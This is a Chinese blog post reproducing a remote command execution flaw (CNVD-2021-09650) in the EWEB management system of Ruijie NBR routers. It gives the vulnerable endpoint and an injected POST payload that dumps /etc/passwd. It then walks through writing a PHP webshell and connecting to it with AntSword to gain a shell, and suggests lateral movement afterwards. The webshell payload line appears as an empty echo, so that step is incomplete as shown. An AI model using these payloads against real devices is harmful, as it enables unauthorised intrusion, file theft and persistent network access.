锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
漏洞编号:
CNVD-2021-09650

漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取

漏洞影响:
锐捷NBR路由器 EWEB网关系统

漏洞复现:
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell_第1张图片
首先打开网关系统
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell_第2张图片

然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。
我们打开hacker Bar,在Post data 输入 mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
这句代码的意思是使用cat 查看/etc/passwd路径下的passwd 文件,并将内容保存到test.txt

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell_第3张图片

接着我们访问url/test.txt 路径,查看文件。

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell_第4张图片

回显了/etc/passwd路径下passwd文件的内容

利用漏洞文件文件上传。
利用此漏洞我们可以将一句话木马写入sorry.php文件,然后用蚁剑来连接webshell.

漏洞复现:

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell_第5张图片

Payload :
mac=1&ip=127.0.0.1|echo ‘’ > sorry.php

将这句话execute一下。

然后我们直接上蚁剑连接就ok了
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell_第6张图片

这边直接能看到我们上传的webshell
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell_第7张图片

右击终端
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell_第8张图片
然后就可以进一步的横向或者纵向,也可以进一步信息收集。

博客来之不易,还望各位大佬点赞关注,谢谢!
想找安全岗位私信内推哦!

你可能感兴趣的:(web安全,安全,linux)